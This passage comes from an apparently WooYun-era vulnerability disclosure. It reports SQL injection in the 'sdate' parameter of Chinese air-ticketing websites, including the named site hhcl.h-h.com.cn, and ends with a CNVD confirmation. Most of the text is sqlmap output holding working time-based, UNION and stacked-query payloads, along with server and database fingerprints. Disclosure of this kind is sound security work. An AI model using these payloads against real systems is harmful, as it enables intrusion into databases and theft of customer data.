YSBocmVmPSIvT3JkZXIvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL1JldHVybi5hc3B4Ij7CtyDpgIDnpajorrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3NjZ3FfbGlzdC5hc3B4Ij7CtyDljYfoiLHmlLnmnJ/orrDlvZU8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleWuoeaguDwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvQ2hlY2svZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXheaKpeihqDwvYT48aSBjbGFzcz0iaWNvMDYiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvUmVwb3J0L2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC92aXNhLmFzcHgiPsK3IOetvuivgTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2J4LmFzcHgiPsK3IOS/nemZqTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L290aGVyLmFzcHgiPsK3IOWFtuWugzwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6LSi5Yqh566h55CGPC9hPjxpIGNsYXNzPSJpY28wNyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvZmtzcV9tZWIuYXNweCI+wrcg5LuY5qy+55Sz6K+36K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvcGF5X2hpc3RvcnkuYXNweCI+wrcg5bey5LuY5qy+6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvb3JkZXJzX2FsbC5hc3B4Ij7CtyDnu7zlkIjnu5/orqE8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC94Y2Rfb3JkZXJzLmFzcHgiPsK3IOihjOeoi+WNleS6pOaOpTwvYT48L2xpPjwvdWw+PC9saT5kAgsPFgIeC18hSXRlbUNvdW50ZmQCDQ9kFggCAQ8PFgIfAAVI5LiK5rW35pel5pyI6KGM6Iiq56m656Wo5Yqh5pyN5Yqh5pyJ6ZmQ5YWs5Y+4ICAgICDmsqpJQ1DlpIcxMTA0Mjc2NOWPty0xZGQCAw8PFgIfAAUw5Zyw5Z2A77ya5LiK5rW35biC5aSn5rih5rKz6LevMTcxOOWPt0LluqdCNzA35a6kZGQCBQ8PFgIfAAU655S16K+d77yaMDIxLTUxMDk2OTU5IDAyMS01MTA5NjEwMCAgIOS8oOecn++8mjAyMS01MTA2MjA5MGRkAgcPFgIfAAVLPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPnNldEludGVydmFsKCdtZXNzYWdlX3R4KCknLCAzMDAwMCk7PC9zY3JpcHQ+ZGQLlUfXjIPcz7cRnJLQ7WiqVS6Qk58FN7zSQNz+3gjT+w==&__EVENTVALIDATION=/wEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu/7scte&sdate=2015/6/15');WAITFOR DELAY '0:0:10'--&edate=2015/6/15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFCGRrYWpzZGtqZGQCBQ8PFgIfAAUMMDIxLTUxMDk2OTU5ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABaAPPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50LyI+wrcg5Zu96ZmF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvVHJhaW4vIj7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleafpeivojwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvT3JkZXIvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL1JldHVybi5hc3B4Ij7CtyDpgIDnpajorrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3NjZ3FfbGlzdC5hc3B4Ij7CtyDljYfoiLHmlLnmnJ/orrDlvZU8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleWuoeaguDwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvQ2hlY2svZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXheaKpeihqDwvYT48aSBjbGFzcz0iaWNvMDYiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvUmVwb3J0L2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC92aXNhLmFzcHgiPsK3IOetvuivgTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2J4LmFzcHgiPsK3IOS/nemZqTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L290aGVyLmFzcHgiPsK3IOWFtuWugzwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6LSi5Yqh566h55CGPC9hPjxpIGNsYXNzPSJpY28wNyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvZmtzcV9tZWIuYXNweCI+wrcg5LuY5qy+55Sz6K+36K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvcGF5X2hpc3RvcnkuYXNweCI+wrcg5bey5LuY5qy+6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvb3JkZXJzX2FsbC5hc3B4Ij7CtyDnu7zlkIjnu5/orqE8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC94Y2Rfb3JkZXJzLmFzcHgiPsK3IOihjOeoi+WNleS6pOaOpTwvYT48L2xpPjwvdWw+PC9saT5kAgsPFgIeC18hSXRlbUNvdW50ZmQCDQ9kFggCAQ8PFgIfAAVI5LiK5rW35pel5pyI6KGM6Iiq56m656Wo5Yqh5pyN5Yqh5pyJ6ZmQ5YWs5Y+4ICAgICDmsqpJQ1DlpIcxMTA0Mjc2NOWPty0xZGQCAw8PFgIfAAUw5Zyw5Z2A77ya5LiK5rW35biC5aSn5rih5rKz6LevMTcxOOWPt0LluqdCNzA35a6kZGQCBQ8PFgIfAAU655S16K+d77yaMDIxLTUxMDk2OTU5IDAyMS01MTA5NjEwMCAgIOS8oOecn++8mjAyMS01MTA2MjA5MGRkAgcPFgIfAAVLPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPnNldEludGVydmFsKCdtZXNzYWdlX3R4KCknLCAzMDAwMCk7PC9zY3JpcHQ+ZGQLlUfXjIPcz7cRnJLQ7WiqVS6Qk58FN7zSQNz+3gjT+w==&__EVENTVALIDATION=/wEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu/7scte&sdate=2015/6/15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(70)+CHAR(68)+CHAR(78)+CHAR(110)+CHAR(77)+CHAR(115)+CHAR(112)+CHAR(90)+CHAR(104)+CHAR(75)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015/6/15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
current database: 'ryx_sha'


案例五:http://hhcl.h-h.com.cn/


1.jpg


2.jpg


3.jpg


<code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUFZGthZGpkZAIFDw8WAh8ABQwwMTAtNTE2NjIzNTVkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFrg88bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvZ2p0aWNrZXRzLmFzcHgiPsK3IOWbvemZheacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvSG90ZWwvIj7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1RyYWluLyI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7orqLljZXmn6Xor6I8L2E+PGkgY2xhc3M9ImljbzA0Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL09yZGVyL2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9SZXR1cm4uYXNweCI+wrcg6YCA56Wo6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9zY2dxX2xpc3QuYXNweCI+wrcg5Y2H6Iix5pS55pyf6K6w5b2VPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7orqLljZXlrqHmoLg8L2E+PGkgY2xhc3M9ImljbzA1Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0NoZWNrL2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7lt67ml4XmiqXooag8L2E+PGkgY2xhc3M9ImljbzA2Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL1JlcG9ydC9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvdmlzYS5hc3B4Ij7CtyDnrb7or4E8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ieC5hc3B4Ij7CtyDkv53pmak8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9vdGhlci5hc3B4Ij7CtyDlhbblroM8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPui0ouWKoeeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDciPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL2Zrc3FfbWViLmFzcHgiPsK3IOS7mOasvueUs+ivt+iusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3BheV9oaXN0b3J5LmFzcHgiPsK3IOW3suS7mOasvuiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL29yZGVyc19hbGwuYXNweCI+wrcg57u85ZCI57uf6K6hPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwveGNkX29yZGVycy5hc3B4Ij7CtyDooYznqIvljZXkuqTmjqU8L2E+PC9saT48L3VsPjwvbGk+ZAILDxYCHgtfIUl0ZW1Db3VudGZkAg0PZBYGAgEPDxYCHwAFX0NvcHlyaWdodCAmY29weTsgMjAxNCBoaGNsLmgtaC5jb20uY24gYWxsIHJpZ2h0cyByZXNlcnZlZC4g5YyX5Lqs5rW35Y2O6Iiq56m65pyN5Yqh5pyJ6ZmQ5YWs5Y+4ZGQCAw8PFgIfAAUx5Zyw5Z2A77ya5YyX5Lqs5biC5Lic5Z+O5Yy65a6J5b636Lev55SyMTDlj7c1LTEwNWRkAgUPDxYCHwAFK+eUteivne+8mjAxMC01MTY2MjM1NSDkvKDnnJ/vvJowMTAtNTE2Njg0NTBkZGQ4DgfmxxdQd1D4B9sSChUIuH8jnZxCNN1XTiLowCZMtA==&__EVENTVALIDATION=/wEWCgL176S6AgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7A

漏洞证明:

修复方案:

过滤

版权声明:转载请注明来源 missy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-19 17:19

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-15 15:25 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    机票诈骗最近有点回春